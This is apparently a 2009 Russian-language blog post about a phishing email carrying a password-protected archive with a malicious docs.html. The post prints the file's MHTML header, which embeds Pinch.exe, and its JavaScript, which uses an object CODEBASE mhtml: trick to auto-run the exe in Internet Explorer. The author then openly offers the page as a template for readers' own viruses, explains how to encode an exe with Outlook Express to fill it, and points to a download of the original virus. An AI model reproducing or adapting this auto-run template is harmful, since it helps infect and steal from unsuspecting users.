Запуск exe файла через html страницу
🕛 17.09.2009, 14:24
Сидел я в интернет-клубе, ползал по просторам интернета и решил проверить свой почтовый ящик. Там оказалось недавно пришедшее письмо странного содержания. В начале втирали про что-то на русско-английском языке, а потом такая фраза: "Я слышал, что ты болеешь. Выздоравливай скорее!". Примерно так. Что за чудо, я не болел уже давно. К письму был прикреплен архив, защищенный паролем. А пароль был в тексте письма: docs. В письме говорилось, что в архиве лежат пароли боссов. Опять вирусы, сказал я и принялся обезвреживать бомбу :))Пароль к архиву подошел (так а тож), и передо мной предстал ни вчем не повинный html файлик объемом всего в 15 килобайт. Ну естественно запускать я его не стал, а нажал "F4" (в Total Commander'e). Откылся Блокнот, с содержанием файла docs.html.
MIME-Version: 1.0
Content-Location:file:///Pinch.exe
Content-Transfer-Encoding: base64
[BINARY TEXT VIRUS]
<title>Welcome - Home</title> <body bgcolor=black scroll=no> <SCRIPT> function malware() { s=document.URL;path=s.substr(-0,s.lastIndexOf("\\")); path=unescape(path); document.write( ' <title>Welcome - Home</title><body scroll=no bgcolor=black><FONT face="Comic Sans MS" color=red style="position:absolute;top:20;left:90;z-index:100; font-size:2cm;">Sorry, Error On This Page! Please Open With Internet Explorer</center><object style="cursor:cross-hair" alt="Sorry, Error On This Page! Please Open With Internet Explorer" classid="clsid:66666666-6666-6666-6666" CODEBASE="mhtml:'+path+'\\docs.html!file:///Pinch.exe"></object>') } setTimeout("malware()",150) </script>
Строка [BINARY TEXT VIRUS] означает, что на этом месте был закодирован exe файл вируса, вставлять я его не стал, уж слишком много места займет. Если тебе важен оригинал вируса, то его можно без проблем скачать от сюда.
Перед вами макет автозапуска виря из html файла. Его можно использовать и для ваших творений :)) Просто замените текст [BINARY TEXT VIRUS] на ваш код exe файла. А код можно легко получить следующим образом...
Зайдите в Outlook Express и нажмите "Написать новое сообщение", в открывшемся окне щелкните "Вставка" -> "Вложение файла". Теперь "Файл" -> "Сохранить как...". После сохранения письма, его нужно открыть в Текстовом редакторе и вырезать тот самый код exe файла. И всё!
P.S. За всю мою жизнь, в интернете я подцепил всего лишь ОДНОГО! виря и то не я его нашел, а он меня нашел, и назывался MSBlaster (использующий уязвимость в WinXP - DCOM). Thats All.